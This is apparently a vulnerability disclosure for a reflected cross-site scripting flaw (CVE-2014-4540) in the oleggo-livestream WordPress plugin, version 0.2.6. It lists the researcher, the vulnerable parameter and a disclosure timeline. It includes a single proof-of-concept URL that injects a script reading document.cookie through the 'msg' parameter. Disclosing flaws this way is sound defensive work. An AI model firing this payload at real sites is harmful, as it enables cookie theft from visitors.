wp-plugin : oleggo-livestream – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : oleggo-livestream

 

Effected Version : 0.2.6 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

PoC:
http://localhost/wordpress/wp-content/wp-plugs/oleggolivestream/oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Vulnerable Parameter : msg

 

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4540

 
Plugin Description :
 
Oleggo LiveStream is a wordpress plugin that integrates video streaming, twitter and facebook to improve your streaming events.

Oleggo LiveStream can manage video streaming (from youtube, vimeo, ustream or whatever you want), plus you can add twitter hashtags search and facebook live streaming. Using these services you can create a great livestreaming event page.

Leave a Reply

Your email address will not be published. Required fields are marked *